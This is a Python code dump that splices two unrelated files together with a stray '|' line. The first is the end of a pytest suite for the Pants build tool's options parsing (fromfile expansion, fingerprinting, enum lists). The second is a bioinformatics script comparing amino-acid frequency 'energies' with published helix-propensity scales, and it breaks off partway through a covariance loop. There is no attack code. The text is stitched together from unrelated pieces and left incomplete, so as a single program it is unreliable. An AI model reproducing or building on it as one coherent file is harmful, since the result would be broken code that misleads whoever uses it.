    with pytest.raises(Options.DuplicateScopeError):
        Options.complete_scopes([ScopeInfo("foo"), ScopeInfo("bar"), ScopeInfo("foo")])
def test_get_fingerprintable_for_scope(self) -> None:
    """Spot-check the (type, value) pairs reported as fingerprintable for one scope."""
    options = self._parse(
        flags='--store-true-flag --num=88 compile --modifycompile="blah blah blah" '
        '--modifylogs="durrrr" -- -d -v'
    )
    # NB: Passthrough args end up on our `--modifypassthrough` arg.
    pairs = options.get_fingerprintable_for_scope("compile")
    assert [(str, "blah blah blah"), (str, ["-d", "-v"])] == pairs
def test_fingerprintable(self) -> None:
    """Options marked explicitly-not-fingerprinted are excluded from the fingerprintable set."""
    options = self._parse(
        flags=(
            "--implicitly-fingerprinted=shall_be_fingerprinted"
            " --explicitly-fingerprinted=also_shall_be_fingerprinted"
            " --explicitly-not-fingerprinted=shant_be_fingerprinted"
        )
    )
    fingerprinted = options.get_fingerprintable_for_scope(GLOBAL_SCOPE)
    assert (str, "shall_be_fingerprinted") in fingerprinted
    assert (str, "also_shall_be_fingerprinted") in fingerprinted
    assert (str, "shant_be_fingerprinted") not in fingerprinted
def test_fingerprintable_daemon_only(self) -> None:
    """With daemon_only=True, only explicitly-daemoned options are reported."""
    options = self._parse(
        flags=(
            "--explicitly-daemoned=shall_be_fingerprinted"
            " --explicitly-not-daemoned=shant_be_fingerprinted"
            " --implicitly-not-daemoned=also_shant_be_fingerprinted"
        )
    )
    daemon_pairs = options.get_fingerprintable_for_scope(GLOBAL_SCOPE, daemon_only=True)
    assert (str, "shall_be_fingerprinted") in daemon_pairs
    assert (str, "shant_be_fingerprinted") not in daemon_pairs
    assert (str, "also_shant_be_fingerprinted") not in daemon_pairs
def assert_fromfile(self, parse_func, expected_append=None, append_contents=None):
    """Shared driver for the @fromfile tests.

    Each value kind is written to a temp file and parsed via the caller-supplied
    `parse_func`, which decides the delivery channel (flag, config, or env).

    parse_func      -- callable(dest, fromfile_path, passthru_flags) -> parsed Options
    expected_append -- expected value of the append-type option (defaults below)
    append_contents -- temp-file contents for the append-type option (defaults below)
    """

    def _do_assert_fromfile(dest, expected, contents, passthru_flags=""):
        # Round-trip: write `contents`, parse `@<tempfile>`, expect `expected`.
        with temporary_file(binary_mode=False) as fp:
            fp.write(contents)
            fp.close()
            options = parse_func(dest, fp.name, passthru_flags)
            assert expected == options.for_scope("fromfile")[dest]

    _do_assert_fromfile(dest="string", expected="jake", contents="jake")
    _do_assert_fromfile(dest="intvalue", expected=42, contents="42")
    # Dict and list contents may be spread over several lines.
    _do_assert_fromfile(
        dest="dictvalue",
        expected={"a": 42, "b": (1, 2)},
        contents=dedent(
            """
            {
              'a': 42,
              'b': (
                1,
                2
              )
            }
            """
        ),
    )
    _do_assert_fromfile(
        dest="listvalue",
        expected=["a", "1", "2"],
        contents=dedent(
            """
            ['a',
             1,
             2]
            """
        ),
    )
    # Passthrough args are appended after the fromfile-provided list members.
    _do_assert_fromfile(
        dest="passthru_listvalue",
        expected=["a", "1", "2", "bob", "@jake"],
        contents=dedent(
            """
            ['a',
             1,
             2]
            """
        ),
        passthru_flags="bob @jake",
    )
    expected_append = expected_append or [1, 2, 42]
    append_contents = append_contents or dedent(
        """
        [
         1,
         2,
         42
        ]
        """
    )
    _do_assert_fromfile(dest="appendvalue", expected=expected_append, contents=append_contents)
def test_fromfile_flags(self) -> None:
    """@fromfile expansion works for values supplied via command-line flags."""

    def parse_func(dest, fromfile, passthru_flags):
        flag_name = dest.replace("_", "-")
        return self._parse(flags=f"fromfile --{flag_name}=@{fromfile} -- {passthru_flags}")

    # You can only append a single item at a time with append flags, ie: we don't override the
    # default list like we do with env of config. As such, send in a single append value here
    # instead of a whole default list as in `test_fromfile_config` and `test_fromfile_env`.
    self.assert_fromfile(parse_func, expected_append=[42], append_contents="42")
def test_fromfile_config(self) -> None:
    """@fromfile expansion works for values supplied via the config file."""

    def parse_func(dest, fromfile, passthru_flags):
        config = {"fromfile": {dest: f"@{fromfile}"}}
        return self._parse(flags=f"fromfile -- {passthru_flags}", config=config)

    self.assert_fromfile(parse_func)
def test_fromfile_env(self) -> None:
    """@fromfile expansion works for values supplied via environment variables."""

    def parse_func(dest, fromfile, passthru_flags):
        env = {f"PANTS_FROMFILE_{dest.upper()}": f"@{fromfile}"}
        return self._parse(flags=f"fromfile -- {passthru_flags}", env=env)

    self.assert_fromfile(parse_func)
def test_fromfile_json(self) -> None:
    """A fromfile with a .json suffix is parsed as JSON."""
    val = {"a": {"b": 1}, "c": [2, 3]}
    with temporary_file(suffix=".json", binary_mode=False) as fp:
        json.dump(val, fp)
        fp.close()
        # The original interpolated the literal {'dictvalue'} through an f-string
        # for no reason; the flag name is now written directly.
        options = self._parse(flags=f"fromfile --dictvalue=@{fp.name}")
        assert val == options.for_scope("fromfile")["dictvalue"]
def test_fromfile_yaml(self) -> None:
    """A fromfile with a .yaml suffix is parsed as YAML."""
    val = {"a": {"b": 1}, "c": [2, 3]}
    with temporary_file(suffix=".yaml", binary_mode=False) as fp:
        yaml.safe_dump(val, fp)
        fp.close()
        # The original interpolated the literal {'dictvalue'} through an f-string
        # for no reason; the flag name is now written directly.
        options = self._parse(flags=f"fromfile --dictvalue=@{fp.name}")
        assert val == options.for_scope("fromfile")["dictvalue"]
def test_fromfile_yaml_trailing_newlines_matter(self) -> None:
    """A YAML keep-chomping block scalar (|+) must retain its trailing newline."""
    with temporary_file(suffix=".yaml", binary_mode=False) as fp:
        fp.write(
            dedent(
                """\
                a: |+
                  multiline
                """
            )
        )
        fp.close()
        # The original interpolated the literal {'dictvalue'} through an f-string
        # for no reason; the flag name is now written directly.
        options = self._parse(flags=f"fromfile --dictvalue=@{fp.name}")
        assert {"a": "multiline\n"} == options.for_scope("fromfile")["dictvalue"]
def test_fromfile_relative_to_build_root(self) -> None:
    """A relative @fromfile path is resolved against the build root."""
    with temporary_dir(root_dir=get_buildroot()) as tmp_dir:
        rel_dir = tmp_dir.split("/")[-1]
        Path(tmp_dir, "config").write_text("{'a': 'multiline\\n'}")
        with pushd(tmp_dir):
            options = self._parse(flags=f"fromfile --dictvalue=@{rel_dir}/config")
            assert {"a": "multiline\n"} == options.for_scope("fromfile")["dictvalue"]
def test_fromfile_error(self) -> None:
    """Referencing a nonexistent @fromfile raises FromfileError when the value is consumed."""
    options = self._parse(flags="fromfile --string=@/does/not/exist")
    with pytest.raises(FromfileError):
        options.for_scope("fromfile")
def test_fromfile_escape(self) -> None:
    """A doubled `@@` escapes fromfile expansion, yielding a literal leading `@`."""
    options = self._parse(flags=r"fromfile --string=@@/does/not/exist")
    assert "@/does/not/exist" == options.for_scope("fromfile").string
def test_ranked_value_equality(self) -> None:
    """RankedValue equality requires both the rank and the value to match."""
    unset = RankedValue(Rank.NONE, None)
    hardcoded = RankedValue(Rank.HARDCODED, "some")
    assert unset == RankedValue(Rank.NONE, None)
    assert hardcoded == RankedValue(Rank.HARDCODED, "some")
    assert hardcoded != unset
    # Same rank, different value:
    assert hardcoded != RankedValue(Rank.HARDCODED, "few")
    # Same value, different rank:
    assert hardcoded != RankedValue(Rank.CONFIG, "some")
def test_pants_global_with_default(self) -> None:
    """This test makes sure values under [DEFAULT] still gets read."""
    # This cast shouldn't be necessary - likely a bug in MyPy. Once this gets fixed, MyPy will
    # tell us that we can remove the cast.
    config = cast(
        Dict[str, Dict[str, Any]],
        {"DEFAULT": {"num": "99"}, "GLOBAL": {"store_true_flag": True}},
    )
    global_options = self._parse(config=config).for_global_scope()
    # [DEFAULT] supplies `num`; [GLOBAL] supplies the flag.
    assert 99 == global_options.num
    assert global_options.store_true_flag
def test_double_registration(self) -> None:
    """Registering the same option twice in one scope raises OptionAlreadyRegistered."""
    options = Options.create(
        env={},
        config=self._create_config(),
        known_scope_infos=OptionsTest._known_scope_infos,
        args=shlex.split("./pants"),
    )
    options.register(GLOBAL_SCOPE, "--foo-bar")
    with pytest.raises(OptionAlreadyRegistered):
        # Second registration of the identical flag must fail.
        options.register(GLOBAL_SCOPE, "--foo-bar")
def test_enum_serializability(self) -> None:
    # We serialize options to JSON e.g., when uploading stats.
    # This test spot-checks that enum types can be serialized.
    options = self._parse(flags="enum-opt --some-enum=another-value")
    # Raises if the enum value cannot be encoded; no assertion needed.
    json.dumps({"foo": [options.for_scope("enum-opt").as_dict()]}, cls=CoercingEncoder)
def test_list_of_enum_single_value(self) -> None:
    """A single flag value becomes a one-element list of the enum member."""
    options = self._parse(flags="other-enum-scope --some-list-enum=another-value")
    result = options.for_scope("other-enum-scope").some_list_enum
    assert result == [self.SomeEnumOption.another_value]
def test_list_of_enum_default_value(self) -> None:
    """A bare value extends the default list; with no flag, only the default remains."""
    options = self._parse(flags="other-enum-scope --some-list-enum-with-default=another-value")
    extended = options.for_scope("other-enum-scope").some_list_enum_with_default
    assert extended == [self.SomeEnumOption.yet_another, self.SomeEnumOption.another_value]

    options = self._parse()
    default_only = options.for_scope("other-enum-scope").some_list_enum_with_default
    assert default_only == [self.SomeEnumOption.yet_another]
def test_list_of_enum_from_config(self) -> None:
    """A list-of-enum option can be populated from a config-file list literal."""
    options = self._parse(
        config={"other-enum-scope": {"some_list_enum": "['one-more', 'a-value']"}}
    )
    result = options.for_scope("other-enum-scope").some_list_enum
    assert result == [self.SomeEnumOption.one_more, self.SomeEnumOption.a_value]
def test_list_of_enum_duplicates(self) -> None:
    """Duplicate members in a list-of-enum value are rejected at consumption time."""
    options = self._parse(
        flags="other-enum-scope --some-list-enum=\"['another-value', 'one-more', 'another-value']\""
    )
    with pytest.raises(ParseError, match="Duplicate enum values specified in list"):
        options.for_scope("other-enum-scope")
def test_list_of_enum_invalid_value(self) -> None:
    """A list containing a non-member value raises ParseError at consumption time."""
    options = self._parse(
        flags="other-enum-scope --some-list-enum=\"['another-value', 'not-a-value']\""
    )
    with pytest.raises(ParseError, match="Error computing value for --some-list-enum"):
        options.for_scope("other-enum-scope")
def test_list_of_enum_set_single_value(self) -> None:
    """An explicit [...] value replaces the default list entirely."""
    options = self._parse(
        flags="other-enum-scope --some-list-enum-with-default=\"['another-value']\""
    )
    result = options.for_scope("other-enum-scope").some_list_enum_with_default
    assert result == [self.SomeEnumOption.another_value]
def test_list_of_enum_append(self) -> None:
    """A +[...] value appends to the default list."""
    options = self._parse(
        flags="other-enum-scope --some-list-enum-with-default=\"+['another-value']\""
    )
    result = options.for_scope("other-enum-scope").some_list_enum_with_default
    assert result == [self.SomeEnumOption.yet_another, self.SomeEnumOption.another_value]
def test_list_of_enum_remove(self) -> None:
    """A -[...] value removes matching members from the default list."""
    options = self._parse(
        flags="other-enum-scope --some-list-enum-with-default=\"-['yet-another']\""
    )
    result = options.for_scope("other-enum-scope").some_list_enum_with_default
    assert result == []
|
#!/usr/bin/env python
"""
Typical usage:
amino_acid_energy.py [candidate.txt] < all_sequences.txt
In this example, "all_sequences.txt" contains a large list of sequences
from which the probability of each character appearing is determined.
The natural logarithm of the probability of each type of character
is returned to the user, along with the probability that the corresponding
amino acid would occur at random. This is written to the standard-error.
An optional argument ("candidate.txt") contains a sequence.
If you provide an optional argument (in this example "candidate.txt"),
this program assumes the file contains a sequence of letters, and
that you wish to calculate the probability of that sequence
appearing by chance (using the probabilities you calculated above).
This program calculates the natural logarithm of this probability
and writes it to the standard-out.
"""
import sys
import math
def CalcSequenceEnergy(s, energy):
    """Return the total energy of sequence `s` as the sum of per-residue energies.

    s      -- iterable of single-character residue codes
    energy -- dict mapping residue code -> energy contribution
    Exits the program (status 1) if `s` contains a residue missing from `energy`.
    """
    tot_ener = 0.0
    for c in s:
        if c not in energy:
            sys.stderr.write('\nError: sequence argument contains non-standard amino acid: \''+c+'\'\n')
            # sys.exit, not the site-injected exit(): the latter is absent under
            # `python -S` and in frozen interpreters.
            sys.exit(1)
        tot_ener += energy[c]
    return tot_ener
def CalcSequenceEnergyErr(s, energy, delta_energy):
    """Return (total_energy, uncertainty) for sequence `s`.

    Per-residue uncertainties `delta_energy[c]` are assumed independent, so the
    total uncertainty is the square root of the sum of squared deltas.
    Exits the program (status 1) if `s` contains a residue missing from `energy`.
    """
    tot_ener = 0.0
    var_tot_ener = 0.0
    for c in s:
        if c not in energy:
            sys.stderr.write('\nError: sequence argument contains non-standard amino acid: \''+c+'\'\n')
            # sys.exit, not the site-injected exit(): the latter is absent under
            # `python -S` and in frozen interpreters.
            sys.exit(1)
        tot_ener += energy[c]
        var_tot_ener += (delta_energy[c]**2)
    return tot_ener, math.sqrt(var_tot_ener)
def main():
    """Estimate per-amino-acid 'energies' from residue frequencies read on stdin.

    Reads sequences from stdin, tabulates character frequencies, converts them to
    log-probability 'energies' relative to codon-count expectations, prints a table
    comparing them with published helix-propensity scales (plus Pearson R between
    the metrics), and, if a file name is given as argv[1], scores each sequence in
    that file with every metric.

    Fixes relative to the original:
      * helixPropensityMyersProteinPh7 is now a *copy* of the pH-2.5 table; the
        original aliased it, so applying the pH-7 corrections silently mutated
        the pH-2.5 table as well.
      * the sort key uses a plain lambda + .items() instead of the Python-2-only
        tuple-parameter lambda with .iteritems().
      * the local name `file` no longer shadows the builtin.
    """
    type_count = {}  # keep track of the number of times each character in the
                     # sequence appears in the entire file.
    #lines = sys.stdin.readlines()
    #for line in lines:
    for line in sys.stdin:
        line = line.strip()
        # Count the number of residues of each type
        for c in line:
            if (c in type_count):
                type_count[c] += 1
            else:
                type_count[c] = 1

    # What is the probability of finding each type of amino acid (P[c]) ?
    type_count_tot = 0
    for c in type_count:
        type_count_tot += type_count[c]

    ########## OLD SIMPLE VERSION ############
    #for c in type_count:
    #    P[c] = float(type_count[c])/type_count_tot
    #    # Suppose x = type_count[c] / N
    #    # is the probability of encountering a certain letter (c)
    #    # in a huge list of N letters (in this example type_count_tot = N).
    #    # It's easy to show that the uncertainty in the estimate for
    #    # the probability is sqrt(x*(1-x)/N) for large N.
    #    deltaP[c] = math.sqrt((P[c]*(1.0-P[c])) / type_count_tot)
    ########## NEW VERSION ##############
    # The probabilities should sum up to the probability that
    # a randomly chosen amino acid happens to be in a helix
    #NAA_tot=2123360 # number of amino acids in the database
    #NAA_hel=942456  # number of amino acids in the database in helices
    #NAA_she=509097  # number of amino acids in the database in sheets
    # After throwing away the PDB files containing "MEMBRANE" OR " NMR", we get
    NAA_tot = 1986157  # number of amino acids in the database
    NAA_hel = 886428   # number of amino acids in the database in helices
    NAA_she = 471407   # number of amino acids in the database in sheets
    prior__helix = (float(NAA_hel)/float(NAA_tot))
    prior__sheet = (float(NAA_she)/float(NAA_tot))  # NOTE: computed but unused below

    P = {}
    deltaP = {}
    for c in type_count:
        conditional_probability__c = float(type_count[c])/type_count_tot
        #######################################
        # Giovanni's method:
        P[c] = conditional_probability__c
        deltaP[c] = math.sqrt((P[c]*(1.0-P[c])) / type_count_tot)
        #######################################
        # Andrew's method:
        #
        #joint_probability__c_helix = conditional_probability__c * prior__helix
        #joint_probability__c_sheet = conditional_probability__c * prior__sheet
        #P[c] = joint_probability__c_helix
        #P[c] = joint_probability__c_sheet
        #
        # Uncertainty:
        # Suppose x =
        # is the probability of encountering a certain letter (c)
        # in a huge list of N letters (in this example N=NAA_tot).
        # It's easy to show that the uncertainty in the estimate for
        # the probability is sqrt(x*(1-x)/N) for large N.
        #deltaP[c] = math.sqrt((P[c]*(1.0-P[c])) / NAA_tot)
        #deltaP[c] = math.sqrt((P[c]*(1.0-P[c])) / type_count_tot)
        #
        #######################################

    # This information is somewhat meaningless because
    # some amino acids simply occur more often than others
    # even in the absence of evolutionary pressure.
    #
    # I want to divide this probability (P[c]) by the probability that
    # this amino acid (c) would occure due to a random mutation in the DNA.
    # Pevo[c] is the probability that an amino acid would be type c
    # due to random mutations (in the absence of evolutionary pressure).
    # I assume (perhaps incorrectly), that this is mostly determined by
    # the number of codons that code for that amino acid.
    Pevo = {}
    num_codons = {'F':2,
                  'L':6,
                  'I':3,
                  'M':1,
                  'V':4,
                  'R':6,
                  'K':2,
                  'D':2,
                  'E':2,
                  'N':2,
                  'Q':2,
                  'H':2,
                  'S':6,
                  'P':4,
                  'T':4,
                  'A':4,
                  'Y':2,
                  'W':1,
                  'C':2,
                  'G':4}
    tot_num_codons = 0  # should end up 4^3-3 = 61
    for c in num_codons:
        tot_num_codons += num_codons[c]
    for c in num_codons:
        Pevo[c] = float(num_codons[c]) / float(tot_num_codons)

    ener = {}
    delta_ener = {}
    for c in type_count:
        if c in Pevo:  #<-if c is one of the standard 20 amino acids)
            if ((P[c] > 0.0) and (Pevo[c] > 0.0)):  #<-log(P) undefined if P=0
                # The next variable can be used to estimate energetic penalties
                # as a result of substituting an amino acid of type c into
                # the environment from which you collected your sequence data.
                # Such energetic penalties may explain why some amino acids
                # appear more or less often than you would expect by
                # considering the number of codons that code for them.
                ener[c] = math.log(Pevo[c] / P[c])
                delta_ener[c] = deltaP[c] / P[c]
                # If there were uncertainty in Pevo, we would have to use:
                #delta_lnPevo = deltaPevo[c] / Pevo[c]
                #delta_ener[c] = math.sqrt(delta_lnP**2 + delta_lnPevo**2)

    # Amino acid 1-letter and 3-letter codes:
    OneToThree = {'E':'Glu',
                  'K':'Lys',
                  'D':'Asp',
                  'A':'Ala',
                  'Q':'Gln',
                  'F':'Phe',
                  'N':'Asn',
                  'M':'Met',
                  'L':'Leu',
                  'I':'Ile',
                  'Y':'Tyr',
                  'V':'Val',
                  'W':'Trp',
                  'G':'Gly',
                  'T':'Thr',
                  'H':'His',
                  'R':'Arg',
                  'S':'Ser',
                  'P':'Pro',
                  'C':'Cys'}
    ThreeToOne = dict([[v,k] for k,v in OneToThree.items()])

    # Experimental measures of helix propensity:
    #
    # This one from (Horovitz,Matthews,&Fersht JMB 1992 227:560-568) is in kCal/mole
    # For this experiment, they mutated the amino acid at position 32 within a
    # helix (at positions 26-34 of barnase: TKSEAQALG, according to 1BNR.pdb).
    # The resulting mutants were of the form: TKSEAQxLG
    #                                               ^
    #                                          mutate here
    helixPropensityHorovitz_3ltr = {'Ala':0.00,
                                    'Arg':0.14,
                                    'Lys':0.19,
                                    'Met':0.31,
                                    'Leu':0.35,
                                    'Ser':0.41,
                                    'Gln':0.48,
                                    'Glu':0.55,
                                    'Asn':0.66,
                                    'Phe':0.69,
                                    'Asp':0.71,
                                    'His':0.78,
                                    'Thr':0.79,
                                    'Ile':0.81,
                                    'Tyr':0.82,
                                    'Val':0.88,
                                    'Gly':0.91,
                                    'Trp':0.98,
                                    'Cys':1.00,
                                    'Pro':4.08}
    helixPropensityHorovitz = {}
    for AA in helixPropensityHorovitz_3ltr:
        c = ThreeToOne[AA]
        helixPropensityHorovitz[c] = helixPropensityHorovitz_3ltr[AA]

    # Alternate helix propensity metric:
    # (from O'Neil and Degrado, Science 1990, 250:646-651)
    # Again, units are in kCal/mole.
    # The experiment substituted residues into the following sequence:
    # Ac-EWEALEKKLAALE-X-KLQALEKKLEALEHG at position "X"
    # This is a designed protein, not a natural protein
    helixPropensityONeil_3ltr = {'Ala':-0.77,
                                 'Arg':-0.68,
                                 'Lys':-0.65,
                                 'Met':-0.50,
                                 'Leu':-0.62,
                                 'Ser':-0.35,
                                 'Gln':-0.33,
                                 'Glu':-0.27,
                                 'Asn':-0.07,
                                 'Phe':-0.41,
                                 'Asp':-0.15,
                                 'His':-0.06,
                                 'Thr':-0.11,
                                 'Ile':-0.23,
                                 'Tyr':-0.17,
                                 'Val':-0.14,
                                 'Gly':0.00,
                                 'Trp':-0.45,
                                 'Cys':-0.23,
                                 'Pro': 3.00}
    helixPropensityONeil = {}
    for AA in helixPropensityONeil_3ltr:
        c = ThreeToOne[AA]
        helixPropensityONeil[c] = helixPropensityONeil_3ltr[AA]

    # Blaber, Zhuang, Matthews, Science 1993, 260(5114), 1637-1640
    # (Michael Blaber, Xue-jun Zhang, Brian W. Matthews)
    # In this experiment, they mutated residue 44 of T4 lysozyme
    # and measured the change in the mutant's stability.
    # They also crystalized all (or nearly all) 20 mutants.
    # (According to 2LZM.pdb, this is part of a helix, from residues 39-50
    #  NAAKSELDKA.  In this study, they mutated residue 44 "S")
    helixPropensityBlaber44_3ltr = {'Ala':-0.96,
                                    'Leu':-0.92,
                                    'Met':-0.86,
                                    'Ile':-0.84,
                                    'Gln':-0.80,
                                    'Arg':-0.77,
                                    'Lys':-0.73,
                                    'Tyr':-0.72,
                                    'Val':-0.63,
                                    'Phe':-0.59,
                                    'Trp':-0.58,
                                    'His':-0.57,
                                    'Thr':-0.54,
                                    'Glu':-0.53,
                                    'Ser':-0.53,
                                    'Asp':-0.42,
                                    'Cys':-0.42,
                                    'Asn':-0.39,
                                    'Gly':0.00,
                                    'Pro':2.50}
    helixPropensityBlaber44 = {}
    for AA in helixPropensityBlaber44_3ltr:
        c = ThreeToOne[AA]
        helixPropensityBlaber44[c] = helixPropensityBlaber44_3ltr[AA]

    # The next couple tables were taken from table 1 of
    # Myers+Pace+Scholtz, Biochemistry 1997,36:10923-10929
    #
    # (Incidentally, what they called the "wild type" sequence
    #  based on residues 13-29 of RNase T1:
    #  SSDVSTAQAAGYKLHED
    #  However they muted residue 23 to A
    #  to stabilize the helix.  This resulted in:
    #  SSDVSTAQAAAYKLHED
    #  They then replaced the residue at position 21
    #  with 19 different amino acids (all except proline)
    #
    #  SSDVSTAQxAAYKLHED
    #          ^
    #     mutated here
    helixPropensityMyersProteinPh2p5 = {'A':0.00,
                                        'C':0.74,
                                        'D':-0.33,
                                        'E':-0.05,
                                        'F':0.57,
                                        'G':0.90,
                                        'H':0.56,
                                        'I':0.44,
                                        'K':0.51,
                                        'L':0.13,
                                        'M':0.15,
                                        'N':-0.34,
                                        'Q':0.26,
                                        'R':0.41,
                                        'S':0.49,
                                        'T':0.57,
                                        'V':0.66,
                                        'W':0.30,
                                        'Y':0.39}
    # pH=7 data taken from table 1 of Myers+Pace+Scholtz, Biochemistry 1997
    # (right-most column) when available.  If not available, this data
    # was taken from the pH=2.5 column.  (Perhaps this is okay because,
    # if I understand correctly, only two of the amino acid's protonation
    # states, D,E was effected by the change in pH, and the others
    # did not change that much.  However I remain confused by this
    # I think this is what these authors did when they plotted
    # figure 3.  They didn't explain which pH they used, but I assume that
    # it is reflected in the protonation state of the amino acids in the
    # Still, some amino acids, like H,Q,S have different propensities
    # at pH=2.5 and 7, and I don't know which value they used
    # but I'm guessing they used the pH=7 value.  This was confusing.)
    #
    # BUGFIX: take a copy.  The original assigned the same dict object, so the
    # corrections below also overwrote helixPropensityMyersProteinPh2p5.
    helixPropensityMyersProteinPh7 = dict(helixPropensityMyersProteinPh2p5)
    helixPropensityMyersProteinPh7_corrections = {'A':0.0,
                                                  'D':0.71,
                                                  'E':0.69,
                                                  'H':0.17,
                                                  'Q':0.40,
                                                  'S':0.40}
    for c in helixPropensityMyersProteinPh7_corrections:
        helixPropensityMyersProteinPh7[c] = helixPropensityMyersProteinPh7_corrections[c]

    # Taken from table 2 of Myers+Pace+Scholtz, Biochemistry 1997,36:10923-10929
    helixPropensityMyersPeptidePh2p5 = {'A':0.0,
                                        'C':0.53,
                                        'D':0.66,
                                        'E':0.17,
                                        'F':0.61,
                                        'G':0.98,
                                        'H':1.2,
                                        'I':0.38,
                                        'K':0.45,
                                        'L':0.25,
                                        'M':0.18,
                                        'N':0.66,
                                        'P':1.1,
                                        'Q':0.31,
                                        'R':0.56,
                                        'S':0.51,
                                        'T':0.71,
                                        'V':0.66,
                                        'W':0.14,
                                        'Y':0.45}
    helixPropensityMyersPeptidePh7 = {'A':0.0,
                                      'C':0.51,
                                      'D':0.68,
                                      'E':0.31,
                                      'F':0.59,
                                      'G':0.95,
                                      'H':0.67,
                                      'I':0.29,
                                      'K':0.30,
                                      'L':0.19,
                                      'M':0.12,
                                      'N':0.58,
                                      'P':1.1,
                                      'Q':0.29,
                                      'R':0.38,
                                      'S':0.42,
                                      'T':0.59,
                                      'V':0.61,
                                      'W':0.02,
                                      'Y':0.31}

    # The help the reader, I also subtract off the average of each energy.
    # (First I must calculate these averages.)
    ave_ener = 0.0
    n_temp = 0
    for c in ener:
        if c != 'P':  # According to Horovitz, Proline is an outlier. exclude it
            ave_ener += ener[c]
            n_temp += 1
    if n_temp > 0:
        ave_ener /= n_temp

    avePropHorovitz = 0.0
    for AA in helixPropensityHorovitz_3ltr:
        if AA != 'Pro':  # According to Horovitz, Proline is an outlier. exclude it
            avePropHorovitz += helixPropensityHorovitz_3ltr[AA]
    avePropHorovitz /= (len(helixPropensityHorovitz_3ltr) - 1)

    avePropONeil = 0.0
    # The help the reader, subtract off the average. (First calculate the average)
    for AA in helixPropensityONeil_3ltr:
        if AA != 'Pro':  # According to Horovitz, Proline is an outlier. exclude it
            avePropONeil += helixPropensityONeil_3ltr[AA]
    avePropONeil /= (len(helixPropensityONeil_3ltr) - 1)

    count = 0
    avePropBlaber44 = 0.0
    # The help the reader, subtract off the average. (First calculate the average)
    for c in helixPropensityBlaber44:
        if c != 'P':  # According to Horovitz, Proline is an outlier. exclude it
            avePropBlaber44 += helixPropensityBlaber44[c]
            count += 1
    avePropBlaber44 /= count

    count = 0
    avePropMyersProtein = 0.0
    # The help the reader, subtract off the average. (First calculate the average)
    for c in helixPropensityMyersProteinPh7:
        if c != 'P':  # According to Horovitz, Proline is an outlier. exclude it
            avePropMyersProtein += helixPropensityMyersProteinPh7[c]
            count += 1
    avePropMyersProtein /= count

    count = 0
    avePropMyersPeptide = 0.0
    # The help the reader, subtract off the average. (First calculate the average)
    for c in helixPropensityMyersPeptidePh7:
        if c != 'P':  # According to Horovitz, Proline is an outlier. exclude it
            avePropMyersPeptide += helixPropensityMyersPeptidePh7[c]
            count += 1
    avePropMyersPeptide /= count

    ##############################################################################
    # Now sort the amino acids by energy, and write out the table
    kB = 0.0019872  #Boltzmann's constant for converting T in Kelvin into kcal/mole
    T = 300.0
    sys.stdout.write('\nProbabilities for each type (sum = '+str(prior__helix)+'):\n')
    #sys.stdout.write('C AA Horovitz1992 ONeil1990 ln(Pevo(AA)/P(AA))*kB*T delta(ln(P(AA)))*kB*T P(AA) deltaP Pevo(AA)\n')
    sys.stdout.write('C AA P(AA) deltaP Pevo(AA) ln(Pevo(AA)/P(AA))*kB*T delta(ln(P(AA)))*kB*T ONeil1990 Horovitz1992 Blaber1993 Myers1997pep Myers1997pro\n')
    #for c in ener:
    #    sys.stdout.write(c)
    #sort by value (energy):
    #ener_sorted = sorted(ener.iteritems(), key=lambda(k,v):v)
    #sort by key (amino acid):
    #ener_sorted = sorted(ener.iteritems(), key=lambda(k,v):k)
    ## alternately, to sort by Horovitsz's energy values:
    ##ener_sorted = sorted(helixPropensityHorovitz.iteritems(), key=lambda(k,v):v)
    #for ener_pair in ener_sorted:
    #    c = ener_pair[0]
    # Sort alphabetically by 3-letter code.  (.items() + a plain lambda replaces
    # the Python-2-only `iteritems()` / `lambda(k,v)` form; same ordering.)
    AAsorted = sorted(ThreeToOne.items(), key=lambda kv: kv[0])
    for AA_c_pair in AAsorted:
        c = AA_c_pair[1]
        #sys.stdout.write(c)
        if c in OneToThree:
            sys.stdout.write(' '+OneToThree[c])
        else:
            sys.stdout.write(' ???')
        # NOTE(review): P/deltaP only contain residues seen on stdin; an amino
        # acid absent from the input would raise KeyError here -- confirm inputs
        # always cover all 20 residues.
        #sys.stdout.write(' '+str(P[c])+' '+str(deltaP[c]))
        sys.stdout.write((' %5.3f' % (P[c]*100.0))+(' %5.3f'%(deltaP[c]*100.0)))
        #sys.stdout.write((' & %5.3f' % (P[c]*100.0))+('\ \pm\ %5.3f'%(deltaP[c]*100.0)))
        if c in Pevo:  #<-if c is one of the standard 20 amino acids)
            #sys.stdout.write(' '+str(Pevo[c]))
            sys.stdout.write(' %5.3f' % (Pevo[c]*100.0))
            #sys.stdout.write(' & %5.3f' % (Pevo[c]*100.0))
            # NOTE(review): this zeroes the average computed above, so raw (not
            # mean-shifted) energies are printed and used in the covariances
            # below.  Looks like a deliberate toggle -- confirm.
            ave_ener = 0.0
            #sys.stdout.write((' %5.s3f'%((ener[c]-ave_ener)*kB*T)) + (' %5.3f'%(delta_ener[c]*kB*T)))
            #sys.stdout.write(('& %5.s3f'%((ener[c]-ave_ener)*kB*T)) + (' %5.3f'%(delta_ener[c]*kB*T)))
            #sys.stdout.write(' & %5.3f'%((ener[c]-ave_ener)*kB*T))
            sys.stdout.write(' %5.3f'%((ener[c]-ave_ener)*kB*T))
        if c in helixPropensityONeil:
            sys.stdout.write(' %4.2f' % (helixPropensityONeil[c]-avePropONeil))
        if c in helixPropensityHorovitz:
            sys.stdout.write(' %4.2f' % (helixPropensityHorovitz[c]-avePropHorovitz))
        if c in helixPropensityBlaber44:
            sys.stdout.write(' %4.2f' % (helixPropensityBlaber44[c]-avePropBlaber44))
        if c in helixPropensityMyersPeptidePh7:
            sys.stdout.write(' %4.2f' % (helixPropensityMyersPeptidePh7[c]-avePropMyersPeptide))
        if c in helixPropensityMyersProteinPh7:
            sys.stdout.write(' %4.2f' % (helixPropensityMyersProteinPh7[c]-avePropMyersProtein))
        sys.stdout.write('\n')

    # Now, calculate the Pearlson covariance (R) between the different metrics:
    cov11_Horovitz = 0.0
    cov22_Horovitz = 0.0
    cov12_Horovitz = 0.0
    cov11_ONeil = 0.0
    cov22_ONeil = 0.0
    cov12_ONeil = 0.0
    cov11_Blaber44 = 0.0
    cov22_Blaber44 = 0.0
    cov12_Blaber44 = 0.0
    cov11_MyersProtein = 0.0
    cov22_MyersProtein = 0.0
    cov12_MyersProtein = 0.0
    cov11_MyersPeptide = 0.0
    cov22_MyersPeptide = 0.0
    cov12_MyersPeptide = 0.0
    num_common_AA_Horovitz = 0
    num_common_AA_ONeil = 0
    num_common_AA_Blaber44 = 0
    num_common_AA_MyersProtein = 0
    num_common_AA_MyersPeptide = 0
    for c in ener:
